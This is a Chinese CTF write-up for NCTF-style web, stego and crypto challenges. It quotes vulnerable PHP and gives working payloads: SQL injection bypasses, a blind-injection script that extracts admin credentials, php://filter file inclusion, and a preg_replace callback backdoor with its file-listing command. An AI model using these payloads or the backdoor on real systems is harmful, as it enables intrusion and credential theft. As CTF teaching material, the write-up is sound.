WEB
簽到題1
打開頁面
直接看源碼得到flag
md5 collision
<?php$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "nctf{*****************}";
} else {
echo "false!!!";
}}
else{
echo "please input a";
}
?>
看完後,是php的弱類型比較,還涉及md5值,所以構造一串字符串使得比較相同,度娘
這裏總結了大部分MD5(http://www.219.me/posts/2884.html)
簽到題2
打開發現
嘗試按所說的來,發現最後一位不能輸入。
果斷用burpsuite進行修改
flag得到
這題不是WEB
打開網頁,發現一個動圖
下載下來,扔進UE分析,在最下面發現flag
層層遞進
腦洞題
查看下發現
直接找到flag
AAencode
一看明顯就是一種編碼
解碼就得flag
單身二十年
打開網頁,點擊鏈接,發現跳轉
聯想到他說的手速,直接burpsuite攔截,扔進***Reperter***分析
你從哪裏來
打開一看,什麼也沒有,源碼也沒有啥東西
分析看來他需要僞造來訪問,利用火狐插件
直接構造一個Referer,訪問就得flag
php decode
打開一看是一段代碼,執行後發現出錯,似乎是eval用錯,替換成echo直接輸出,得到flag
<?php
function CLsI($ZzvSWE)
{
$ZzvSWE = gzinflate(base64_decode($ZzvSWE));
for ($i = 0; $i < strlen($ZzvSWE); $i++)
{
$ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);
}
return $ZzvSWE;
}
echo (CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));
?>
文件包含
php://filter
是一種元封裝器, 設計用於數據流打開時的篩選過濾應用。
-
include “test.php”
php文件包含,在執行流中插入寫在其他文件中的有用的代碼。讀取的時候也是數據流形式,因此可以使用php://filter
進行過濾,返回值爲0,1。 -
readfile(“test.php”)
是將文件以數據流的形式讀取過來,並不會執行,但會在前臺瀏覽器上進行解析。返回值是字節數多少。 -
file_get_contents(“test.php”)
返回值爲文本內容
此題運用的就是關於數據流過濾的文件包含,我們一般在進行文件包含的時候都這麼寫include “test.php”
獲得的就是test.php
直接解析出來。但如果運用readfile(“test.php”)
就不進行解析,導致無法在瀏覽器前臺進行顯示。
通過提示可知道這是一道典型的文件包含漏洞,遇見這種使filter
的方式讀取php的源代碼
http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
爆出來一連串字符串,是base64加密
PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=
解密可得:
<html>
<title>asdf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}
?>
</html>
即得flag
單身一百年也沒有用
打開一個鏈接,直接用burpsuite攔截,點擊鏈接點擊key***,用Repeater分析即得flag*
Download~!
利用burpsuite抓包看看,點擊兩個下載比對一下,發現它的url是可變的,而且是base64編碼
這樣的話構造一下download.php的base64編碼
,放置url運行,得到源碼
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
$file_size = filesize($url);
header ( "Pragma: public" );
header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header ( "Cache-Control: private", false );
header ( "Content-Transfer-Encoding: binary" );
header ( "Content-Type:audio/mpeg MP3");
header ( "Content-Length: " . $file_size);
header ( "Content-Disposition: attachment; filename=".$url);
echo(file_get_contents($url));
exit;
}
else {
echo "Access Forbidden!";
}
?>
分析源碼可知有一個hereiskey.php
,構造url提交可得flag
COOKIE
打開網頁,顯示需要登錄,利用burpsuite抓包發現返回的Login=0
,結合提示,需要構造Login=1
,直接利用火狐插件Live HTTP headers***
重新提交即得flag*
MYSQL
<pre>別太開心,flag不在這,這個文件的用途你看完了?
在CTF比賽中,這個文件往往存放着提示信息
TIP:sql.php
<?php
if($_GET[id]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$id = intval($_GET[id]);
$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
if ($_GET[id]==1024) {
echo "<p>no! try again</p>";
}
else{
echo($query[content]);
}
}
?></pre>
根據提示打開robots.txt,發現一堆代碼,因爲**intval函數是轉化整形(http://www.php.net/manual/zh/function.intval.php)構造sql.php?id=1024.1即得flag
sql injection 3
打開就看見
執行的sql語句:SELECT id,title FROM news WHERE id=‘1’
嘗試閉合'
構造語句,發現無論怎麼構造都會出現\
http://115.28.150.176/sqli/index.php?id=1’ select * from news
看來需要幹掉/
。嘗試id ,發現id=2
時出現提示
id: 2 title: gbk_sql_injection
看來是寬字節注入,查閱相關的資料
可知當存在%df
時就會吃掉\
多次嘗試,最終構造
http://115.28.150.176/sqli/index.php?id=�’ union select *,1 from flag%23
出現flag
/x00
view-source:
if (isset ($_GET['nctf'])) {
if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
echo '必須輸入數字才行';
else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '騷年,繼續努力吧啊~';
}
明顯就是字符串截斷,構造:
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%23biubiubiu
得到flag
如:nctf[]=1.#biubiubiu
參考(http://www.2cto.com/article/201502/377462.html)
bypass again
if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) === md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
一開始以爲是md5的弱類型比較,結果發現是恆等於的強類型比較,這時就考慮md5函數的用法,構造?a[]=1&b[]=2
這樣md5函數無法處理數組返回false完成匹配得到flag
變量覆蓋
查看源碼,發現一個source.php
打開發現解題關鍵代碼
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
<?php
extract($_POST);
if ($pass == $thepassword_123) { ?>
<div class="alert alert-success">
<code><?php echo $theflag; ?></code>
</div>
<?php } ?>
<?php } ?>
發現有一個extract
,查閱一下相關資料,發現有漏洞
http://www.w3school.com.cn/php/func_array_extract.asp
這樣不用管之前的值,直接覆蓋就行
得到flagnctf{bian_liang_fu_gai!}
PHP是世界上最好的語言
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>
這道題目的問題在於urldecode()
,傳遞過來的$_GET[id]
已經進行url編碼。那麼這道題目只需要將id=hackerDJ
進行兩次url編碼即可。
最終的payload爲:
僞裝者
提示說必須在本地登陸,好說,直接利用Modify Headers增加X-Forwarder-For:127.0.0.1
刷新即得flag
Header
根據提示頭,查看即得flag
上傳繞過
既然是上傳繞過,嘗試修改後綴,發現不成功
猜測利用截斷,分別構造xi.php .jpg
然後空格Hex修改爲00繞過上傳,發現無法繞過
發現有一個/uploads
,發送的網絡請求對於參數dir存在一個uploads的值,那麼構造/uploads/xi.php[空格]
,修改Hex
下方的文件名依舊是filename="xi.php.jpg
可以參考鏈接
SQL注入1
源碼
<pre><?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = trim($_POST[user]);
$pass = md5(trim($_POST[pass]));
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
echo '</br>'.$sql;
$query = mysql_fetch_array(mysql_query($sql));
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
echo $query[user];
?></pre>
簡單的注入,構造
user=admin '#
發現報錯,仔細閱讀源碼,發現有一個(
,需要閉合
user=admin ')#
得到flag:nctf{ni_ye_hui_sql?}
pass chack
核心源碼
<?php
$pass=@$_POST['pass'];
$pass1=*;//被隱藏起來的密碼
if(isset($pass)) {
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
} else {
echo "the pass is wrong!";
}
} else {
echo "please input pass!";
}
?>
提示一看簡單明瞭
構造
起名字很難
<?php
function noother_says_correct($number)
{
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
echo $flag;
else
echo 'access denied';
?>
一看就是需要賦值key且不能再1-9之間的數字,但是最後需要使key與54975581388相等,這樣的話嘗試十六進制,正好54975581388的十六進制是0xccccccccc全部不在1-9之間
http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
得到flag
密碼重置
莫名其妙這道題,直接抓包,修改user1=YWRtaW4=
和 user=admin
即得flag
php 反序列化
這道題學習到很多
<?php
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "*";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}
?>
由於
get_magic_quotes_gpc()— 獲取當前 magic_quotes_gpc 的配置選項設置
但始終返回 FALSE
,因爲這個魔術引號功能已經從 PHP 中移除了
那麼這道題主要考察的就是序列化與反序列化
可以看一下這個鏈接:
http://www.cnblogs.com/A-Song/archive/2011/12/13/2285619.html
簡單來說:
-
serialize() 把某種含有結構的數據進行轉換,其結果爲某種規定格式的字符串。
-
unserialize() 將已序列化的字符串恢復爲原來的格式或結構
首先把傳入的o。
如o->secret被賦值爲一個"*"
如果$o->secret === $o->enter,那麼就輸出o->secret
由於很難構造相等,那麼查看資料知:
在** PHP **中普通的傳值賦值行爲有個例外就是碰到對象 object 時,在 PHP 5 中是以引用賦值的,除非明確使用了 **clone **關鍵字來拷貝,**PHP **支持引用賦值,使用
$var = &$othervar;
引用賦值意味着兩個變量指向了同一個數據,沒有拷貝任何東西。
我們構造:
<?php
class just4fun {
var $enter;
var $secret;
}
$o = new just4fun();
$o->enter = &$o->secret; //這裏是重點。我們使用引用傳參的特點,讓$o->secret的值和$o->enter的值,這樣兩個變量就永遠相等了
echo serialize($o);
?>
序列化字符串爲:
O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
提交後得到flag
sql injection 4
有提示:
TIP:反斜槓可以用來轉義
仔細查看相關函數的用法
查看源碼:
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';
function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str);
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
echo $flag;
-->
這就可以看出get_magic_quotes_gpc()
這個是查看魔法引號,高版本的php已經移除這個功能,在這裏並不耽誤,
意義:
當 magic_quotes_gpc 打開時,所有的 ’ (單引號), " (雙引號), \ (反斜線) and 空字符會自動轉爲含有反斜線的轉義字符。
鏈接
與stripslashes()
搭配使用,此函數是刪除所有的\
的
鏈接
而htmlentities($str, ENT_QUOTES)
是指編碼所有的雙引號和單引號
鏈接
而通過閱讀這個sql查詢代碼,可以知道,要想避開查詢,就必須構造一個全真代碼,加一個or 1
但之前就多了一個引號
註釋引號的方法有兩種
- 用
'
閉合
- 用
\
轉移
這題直接本地搭個環境
在這裏由於'
被轉移,所以可以使用\
註釋
所以payload:
http://chinalover.sinaapp.com/web15/index.php?username= \&password= or 1%23
大致插入進去的查詢語句是
SELECT * FROM users WHERE name=’ ’ AND pass=’ or 1#’;
得到flag:nctf{sql_injection_is_interesting}
綜合題
打開後一看是jother直接利用火狐的命令行輸出得到解碼後的結果
1bc29b36f623ba82aaf6724fd3b16718.php
結果打開後發現不對,還被嘲諷了一番
這時候看看tip:bash
百度了一下相關,最終查出/.bash_history
這個是用來存放歷史記錄的,這時候嘗試訪問
http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/.bash_history
得到
zip -r flagbak.zip ./*
直接訪問flagbak.zip
會得到一個下載壓縮包,下載即得flag
SQL注入2
查看源代碼
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = $_POST[user];
$pass = md5($_POST[pass]);
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
echo "<p>Logged in! Key: ntcf{**************} </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
可以看出關鍵代碼
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
echo "<p>Logged in! Key: ntcf{**************} ";
}
strcasecmp
是不分大小比較,這樣只要得到密碼md5值相同即可,提示已經說了用union,我們就可以構造最簡單的payload
http://4.chinalover.sinaapp.com/web6/index.php?user=' union select md5(1)# & pass=1
即得flag
綜合題2
得到信息
打開可以看見是一個留言板,由於這道題不是xss的題,所以推測跟注入有關,嘗試隨便點一點
提示查看源碼,裏面存在一些鏈接,但打開沒有獲得有用的信息,不過當點擊此鏈接時,獲得提示
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
很明顯,這是安裝後留下來忘刪除的文件。。。
至於鏈接會出現在主頁上,這就要問管理員了。。。
===============================華麗的分割線=============================
本CMS由Funny公司開發的公司留言板系統,據本技術總監說,此CMS採用國際
頂級的技術所開發,安全性和實用性槓槓滴~</br>
以下是本CMS各文件的功能說明(由於程序猿偷懶,只列了部分文件)
config.php:存放數據庫信息,移植此CMS時要修改
index.php:主頁文件
passencode.php:Funny公司自寫密碼加密算法庫
say.php:用於接收和處理用戶留言請求
sm.txt:本CMS的說明文檔
sae的information_schema表好像沒法檢索,我在這裏給出admin表結構
create table admin (
id integer,
username text,
userpass text,
)
========================================================================
下面是正經的:
本滲透測試平臺由:三隻小瀦(root#zcnhonker.net)& 冷愛([email protected])開
發.由你們周老大我辛苦修改,不能題目都被AK嘛,你們說是不是。所以這一題。。你們做出來也算你們吊咯。
在裏面得知幾個文件,但直接訪問發現不行,猜測一下利用文件方式訪問
http://cms.nuptzj.cn/about.php?file=
依次可得到index.php
、passencode.php
、say.php
、config.php
、about.php
about.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php')){
echo "file參數不能爲空!";
exit();
}else{
$cut=strchr($file,"loginxlcteam");
if($cut==false){
$data=file_get_contents($file);
$date=htmlspecialchars($data);
echo $date;
}else{
echo "<script>alert('敏感目錄,禁止查看!但是。。。')</script>";
}
}
index.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
if(!isset($_COOKIE['username'])){
setcookie('username','');
setcookie('userpass','');
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>皇家郵電滲透測試平臺</title>
<style type="text/css">
<!--
.STYLE1 {font-size: 18px}
-->
</style>
</head>
<body>
<center>
<h1>Xlcteam客戶留言板</h1>
<p><hr /> </p>
<div align="left" style="width:1024px">
<h3> 歡迎來到Xlcteam客戶留言板,各位朋友可以在這裏留下對本公司的意見或建議。<br /><br />
本組織主要爲企業提供網絡安全服務。正如公司名所說,本公司是混跡在“娛樂圈”中的公司,喜歡裝B,一直摸黑競爭對手,從未被黑。<br />
本公司的經營理念爲“技術好,算個吊,摸黑對手有一套,坑到學生才叫吊~”。<br />
你別說不爽我們,有本事來爆我們(科哥)菊花~ come on!! </h3>
</div>
<hr />
<div id="msg" name="msg" align="left" style="width:1024px">
<h2>客戶留言: </h2><hr /><br />
<?php
//這裏輸出用戶留言
include 'antixss.php';
include 'config.php';
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!!".mysql_error());
mysql_select_db($db_name,$con);
$page=$_GET['page'];
if($page=="" || $page==0){
$page='1';
}
$page=intval($page);
$start=($page-1)*7;
$last=$page*7;
$result=mysql_query("SELECT * FROM `message` WHERE display=1 ORDER BY id LIMIT $start,$last");
if(mysql_num_rows($result)>0){
while($rs=mysql_fetch_array($result)){
echo htmlspecialchars($rs['nice'],ENT_QUOTES).":<br />";
echo ' '.antixss($rs['say']).'<br /><hr />';
}
}
mysql_free_result($result);
?>
<center>
<p><a href="index.php">首頁</a>
<?php
$contents=mysql_query("SELECT * FROM `message` WHERE display=1");
if(mysql_num_rows($contents)>0){
$num=mysql_num_rows($contents);
if($num%8!=0){
$pagenum=intval($num/8)+1;
}else{
$pagenum=intval($num/8);
}
for($i=1;$i<=$pagenum;$i++){
echo '<a href="index.php?page='.htmlspecialchars($i).'">'.htmlspecialchars($i).'</a> ';
}
}
mysql_free_result($contents);
mysql_close($con);
?>
<a href="index.php?page=<?php echo htmlspecialchars($pagenum);?>">尾頁</a>
</p>
<form method="post" action="./so.php">
留言搜索(輸入ID):
<input name="soid" type="text" id="soid" />
<input type="submit" value="搜索"/>
</form>
</center>
</div>
<hr />
<div id="say" name="say" align="left" style="width:1024px">
<h2>留言:</h2>
<form method="post" action="./preview.php">
<span class="STYLE1">暱稱:</span>
<input name="nice" type="text" id="nice"
<?php
//這裏是獲取暱稱的cookie再顯示 value=""
$username=$_COOKIE['username'];
$username=htmlspecialchars($username,ENT_QUOTES);
echo ' value="'.$username.'" ';
?> />
</label>
<p class="STYLE1">內容:<br />
<textarea style="width:800px;height:100px" name="usersay" id="usersay"></textarea>
<label>
<br />
<input onclick="return checkform()" type="submit" name="Submit" style="width:600px;height:50px" value="預覽" />
</label>
<br />
(可用[a]網址[/a]代替<a href="網址" >網址</a>) </p>
</form>
</div>
<div>
<h4><a href="./about.php?file=sm.txt">本CMS說明</a></h4>
</div>
<div align="center">
鳴謝·紅客聯盟(HUC)官網<br />
</div>
</center>
<script>
function checkform(){
if(say.nice.value=="" || say.usersay.value==""){
alert("暱稱或留言內容不能爲空");
return false;
}else{
return true;
}
</script>
</body>
</html>
passencode.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
function passencode($content){
//$pass=urlencode($content);
$array=str_split($content);
$pass="";
for($i=0;$i<count($array);$i++){
if($pass!=""){
$pass=$pass." ".(string)ord($array[$i]);
}else{
$pass=(string)ord($array[$i]);
}
}
return $pass;
}
?>
say.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
include 'config.php';
$nice=$_POST['nice'];
$say=$_POST['usersay'];
if(!isset($_COOKIE['username'])){
setcookie('username',$nice);
setcookie('userpass','');
}
$username=$_COOKIE['username'];
$userpass=$_COOKIE['userpass'];
if($nice=="" || $say==""){
echo "<script>alert('暱稱或留言內容不能爲空!(如果有內容也彈出此框,不是網站問題喔~ 好吧,給個提示:查看頁面源碼有驚喜!)');</script>";
exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!!".mysql_error());
mysql_select_db($db_name,$con);
$nice=mysql_real_escape_string($nice);
$username=mysql_real_escape_string($username);
$userpass=mysql_real_escape_string($userpass);
$result=mysql_query("SELECT username FROM admin where username='$nice'",$con);
$login=mysql_query("SELECT * FROM admin where username='$username' AND userpass='$userpass'",$con);
if(mysql_num_rows($result)>0 && mysql_num_rows($login)<=0){
echo "<script>alert('暱稱已被使用,請更換!');</script>";
mysql_free_result($login);
mysql_free_result($result);
mysql_close($con);
exit();
}
mysql_free_result($login);
mysql_free_result($result);
$say=mysql_real_escape_string($say);
mysql_query("insert into message (nice,say,display) values('$nice','$say',0)",$con);
mysql_close($con);
echo '<script>alert("構建和諧社會,留言需要經過管理員審覈纔可以顯示!");window.location = "./index.php"</script>';
?>
從index.php
可以知道antixss.php
,源碼得知有so.php
、preview.php
preview.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>預覽留言</title>
</head>
<body>
<?php
$prenice=$_POST['nice'];
$presay=$_POST['usersay'];
include 'antixss.php';
?>
<center>
<div id="say" name="say" align="left" style="width:1024px">
<form method="get" action="./say.php">
<p>
<input name="nice" type="hidden" id="nice" value=<?php echo '"'.htmlspecialchars($prenice).'"'; ?> />
<input name="usersay" type="hidden" id="usersay" value=<?php echo '"'.antixss($presay).'"'; ?> />
<?php echo htmlspecialchars($prenice); ?>:<br />
<?php echo antixss($presay);?><br /><br />
<input onclick="return checkform()" type="submit" name="Submit" style="width:600px;height:50px" value="確認提交" />
</p>
</form>
</div>
(提示:再次提醒,xss不保證可以成功,允許留言是爲了增加娛樂性,換條思路吧!,因爲我也不會xss- -~)
</center>
<script>
function checkform(){
if(say.nice.value=="" || say.usersay.value==""){
alert("暱稱或留言內容不能爲空");
return false;
}else{
return true;
}
</script>
</body>
</html>
so.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>搜索留言</title>
</head>
<body>
<center>
<div id="say" name="say" align="left" style="width:1024px">
<?php
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){
echo '萬惡滴黑闊,本功能只有用本公司開發的瀏覽器纔可以用喔~';
exit();
}
$id=$_POST['soid'];
include 'config.php';
include 'antiinject.php';
include 'antixss.php';
$id=antiinject($id);
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!!".mysql_error());
mysql_select_db($db_name,$con);
$id=mysql_real_escape_string($id);
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result);
echo htmlspecialchars($rs['nice']).':<br /> '.antixss($rs['say']).'<br />';
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
?>
</div>
</center>
</body>
</html>
從so.php
裏知道有antiinject.php
antiinject.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
function antiinject($content){
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");
$info=strtolower($content);
for($i=0;$i<=count($keyword);$i++){
$info=str_replace($keyword[$i], '',$info);
}
return $info;
}
?>
自此,基本上所有的文件源碼都已得到(通過好友雞的貢獻,可以通過腳本直接一鍵全部拔下源碼 博客
腳本代碼
# -*- coding: utf-8 -*-
import requests
import HTMLParser
import codecs
s=['say','config','passencode','index','so','antiinject','antixss','about','preview']
h = HTMLParser.HTMLParser()
for i in s:
url="http://cms.nuptzj.cn/about.php?file={0}.php".format(i);
f=codecs.open(str(i)+'.php','w+','utf-8')#codecs可指定文件編碼
s=requests.get(url)
s.encoding='utf-8'
f.write(h.unescape(s.text))#反轉意html實體
)
分析源碼
通過so.php
和antiinject.php
可以知道關於搜索部分存在sql注入,通過研究antiinject.php
可以知道將一些關鍵字全部替換成空,這樣的話,根據反過濾關鍵字只過濾一次,這樣的話就很好構造注入語句,由於user-agent被固定,所以利用Modify Headers修改一下
構造語句
soid=1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/where/**/length(usernnameame)>4)
得到username
長度爲5
soid=1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/where/**/length(userpaspasss)>33)
得知userpass
長度爲34
然後寫腳本爆賬號密碼
import requests
url = "http://cms.nuptzj.cn/so.php"
header = {
'User-Agent': 'Xlcteam Browser',
'Host': 'cms.nuptzj.cn',
}
dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
result= ""
for j in range(1,6):
for i in dic:
id = '1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/WHERE/**/oORrd(substr(usernnameame,{0},1))>{1})'.format(j,ord(i))
#id ='1/**/aANDnd/**/exists(sSELECTelect/**/*/**/fFROMrom/**/aADMINdmin/**/WHERE/**/oORrd(substr(userpaspasss,{0},1))>{1})'.format(j,ord(i))
data = {
"soid":id
}
response = requests.post(url=url,headers=header,data=data)
if(len(response.text) < 430):
result += i
break
print(result)
賬號admin
密碼1020117099010701140117011001160117
通過passencode.php
可以知道密文是ASCII值,解密得fuckruntu
然後登陸http://cms.nuptzj.cn/loginxlcteam
打開lcteam.php
得到:
<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>
典型的php回調後門,直接掃所有文件
www=preg_replace&wtf=print_r(scandir("."))
得到文件恭喜你獲得flag2.txt
訪問即得flag:nctf{you_are_s0_g00d_hacker}
密碼重置2
一頭霧水,看下tips
TIPS:
1.管理員郵箱觀察一下就可以找到
2.linux下一般使用vi編輯器,並且異常退出會留下備份文件
3.弱類型bypass
通過查看源碼稍微觀察一下就可以得到管理員郵箱
<meta name="admin" content="[email protected]" />
然後根據提示2,度娘一下
鏈接(http://blog.sina.com.cn/s/blog_87f166cf010178sn.html)
可知是會產生.swp
文件,開始嘗試,發現.submit.php.swp
存在,得到關鍵性源碼
........這一行是省略的代碼........
/*
如果登錄郵箱地址不是管理員則 die()
數據庫結構
--
-- 表的結構 `user`
--
CREATE TABLE IF NOT EXISTS `user` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`email` varchar(255) NOT NULL,
`token` int(255) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
--
-- 轉存表中的數據 `user`
--
INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****不可見***', '***不可見***', 0);
*/
........這一行是省略的代碼........
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){
echo $flag;
}else{
echo "失敗了呀";
}
}
**注:**一般火狐會出現亂碼,改一下格式,而用chrome查看源碼不會出現亂碼
通過分析關鍵位置的代碼
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
可知需要讓token爲10位且爲0,其他沒有什麼限制條件,token=0000000000
輸入郵箱,token
即得
flagnctf{thanks_to_cumt_bxs}
隱寫術
女神
下載下來是一張女神的照片,直接用Stegs分析,直接打開file format
找到flag
圖種
將動圖下載下來,既然是圖種,就將格式改爲.zip
,
然後解壓出來一張動圖,分析記得flag
密碼
easy
一看一串字符,base64解密即得
KeyBoard
既然提示是鍵盤,那麼就直接按鍵盤畫得到flag:nctf{areuhack}
base64全家桶
一連串字符
R1pDVE1NWlhHUTNETU4yQ0dZWkRNTUpYR00zREtNWldHTTJES1JSV0dJM0RDTlpUR1kyVEdNWlRHSTJVTU5SUkdaQ1RNTkJWSVkzREVOUlJHNFpUTU5KVEdFWlRNTjJF
一次進行base64、base32、base16解密即得flag
n次base64
直接不斷解密直到得到flag
騷年來一發嗎
一段密文:
iEJqak3pjIaZ0NzLiITLwWTqzqGAtW2oyOTq1A3pzqas
一個php加密的函數,根據特點逆轉解密文件即可
<?php
function decode($str)
{
$_='';
$one=str_rot13($str);
$two=strrev($one);
$three=base64_decode($two);
$four=strrev($three);
for($i=0;$i<strlen($four);$i++)
{
$_c=substr($four,$i,1);
$__=ord($_c)-1;
